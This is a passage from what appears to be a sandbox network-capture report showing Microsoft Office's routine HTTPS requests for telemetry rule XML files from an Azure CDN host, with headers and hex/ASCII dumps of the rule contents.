3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.4	49739	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:56 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:56 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:56 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: a31f2de1-f01e-0096-7209-2d10ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174556Z-16547b76f7fcrtpchC1DFW52e800000005m0000000002rc3 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:56 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.4	49742	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:56 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:56 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:56 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: 9f0f5f99-201e-0096-25f1-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174556Z-16547b76f7f7lhvnhC1DFWa2k000000005cg00000000bd3k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:56 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.4	49738	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:56 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:56 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:56 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: be525922-801e-00a0-03ff-2c2196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174556Z-16547b76f7fq9mcrhC1DFWq15w00000005dg00000000fvm5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-05 17:45:56 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.4	49740	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:56 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:56 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:56 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 23b843a5-001e-0065-686a-2e0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174556Z-15869dbbcc6ss7fxhC1DFW86fs000000020g00000000xudp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:56 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.4	49741	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:56 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:56 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:56 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: d6aac9e3-501e-0064-155f-2e1f54000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174556Z-17df447cdb57srlrhC1DFWwgas00000001qg00000000kgbc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:56 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	49744	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:57 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:57 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:57 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 2b307645-e01e-001f-335c-2e1633000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174557Z-15869dbbcc68l9dbhC1DFWgc3n000000021000000000hcf4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:57 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.4	49745	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:57 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:57 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:57 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: c8bf6ef5-601e-00ab-06f0-2e66f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174557Z-17df447cdb59mt7dhC1DFWqpg400000001pg0000000040m1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:57 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	49743	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:57 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:57 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:57 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 7b71120f-601e-0050-0560-2e2c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174557Z-15869dbbcc6lq2lzhC1DFWym6c00000000dg000000004swd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-05 17:45:57 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	49746	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:57 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:57 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:57 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 23cb21e1-e01e-0052-4e08-2cd9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174557Z-16547b76f7f2g4rlhC1DFWnx8800000005cg00000000ctsk x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:57 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	49747	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:57 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:57 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:57 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: a2886317-b01e-00ab-6c01-2ddafd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174557Z-16547b76f7fwvr5dhC1DFW2c9400000005e000000000635m x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:57 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	49748	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:57 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:58 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:58 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: 8a830f3b-e01e-001f-72e6-2e1633000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174558Z-17df447cdb5bz95mhC1DFWnk7w00000001cg00000000nqvv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:58 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	49749	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:57 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:58 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:58 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 54bee6aa-201e-000c-3258-2e79c4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174558Z-17df447cdb5vq4m4hC1DFWrbp800000001fg00000000pk2p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
